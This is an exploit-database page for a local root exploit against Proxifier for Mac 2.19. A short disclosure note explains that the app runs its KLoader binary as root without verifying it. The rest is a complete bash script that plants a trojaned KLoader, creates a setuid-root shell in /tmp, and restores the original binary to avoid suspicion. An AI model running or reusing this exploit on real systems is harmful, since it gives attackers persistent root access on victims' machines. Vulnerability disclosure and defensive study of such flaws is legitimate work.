Proxifier for Mac 2.19 – Local Privilege Escalation

• Exploit Database
• 14 阅读

• 作者： Mark Wadham
  日期： 2017-12-06
• 类别：

  • local
  平台：

  • macos
• 来源：https://www.exploit-db.com/exploits/43225/

• # With CVE-2017-7643 I disclosed a command injection vulnerablity in the KLoader
  # binary that ships with Proxifier <= 2.18.
  #
  # Unfortunately 2.19 is also vulnerable to a slightly different attack that
  # yields the same result.
  #
  # When Proxifier is first run, if the KLoader binary is not suid root it gets
  # executed as root by Proxifier.app (the user is prompted to enter an admin
  # password).The KLoader binary will then make itself suid root so that it
  # doesn't need to prompt the user again.
  #
  # The Proxifier developers added parameter sanitisation and kext signature
  # verification to the KLoader binary as a fix for CVE-2017-7643 but Proxifier.app
  # does no verification of the KLoader binary that gets executed as root.
  #
  # The directory KLoader sits in is not root-owned so we can replace it with
  # our own binary that will get executed as root when Proxifier starts.
  #
  # To avoid raising any suspicion, as soon we get executed as root we can swap
  # the real KLoader binary back into place and forward the execution call on
  # to it.It does require the user to re-enter their credentials the next time
  # Proxifier is run but it's likely most users wouldn't think anything of this.
  #
  # Users should upgrade to version 2.19.2.
  #
  # https://m4.rkw.io/proxifier_privesc_219.sh.txt
  # 3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac
  # -------------------------------------------------------------------
  
  #!/bin/bash
  
  #####################################################################
  # Local root exploit for vulnerable KLoader binary distributed with #
  # Proxifier for Mac v2.19 #
  #####################################################################
  # by m4rkw,shouts to #coolkids :P #
  #####################################################################
  
  cat > a.c <<EOF
  #include <stdio.h>
  #include <unistd.h>
  
  int main()
  {
  setuid(0);
  seteuid(0);
  
  execl("/bin/bash", "bash", NULL);
  return 0;
  }
  EOF
  
  gcc -o /tmp/a a.c
  
  cat > a.c <<EOF
  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>
  #include <sys/types.h>
  #include <sys/stat.h>
  
  int main(int ac, char *av[])
  {
  if (geteuid() != 0) {
  printf("KLoader: UID not set to 0\n");
  return 104;
  } else {
  seteuid(0);
  setuid(0);
  
  chown("/tmp/a", 0, 0);
  chmod("/tmp/a", strtol("4755", 0, 8));
  rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader");
  chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0);
  chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8));
  execv("/Applications/Proxifier.app/Contents/KLoader", av);
  
  return 0;
  }
  }
  EOF
  
  mv -f /Applications/Proxifier.app/Contents/KLoader /Applications/Proxifier.app/Contents/KLoader2
  gcc -o /Applications/Proxifier.app/Contents/KLoader a.c
  rm -f a.c
  
  echo "Backdoored KLoader installed, the next time Proxifier starts /tmp/a will become suid root."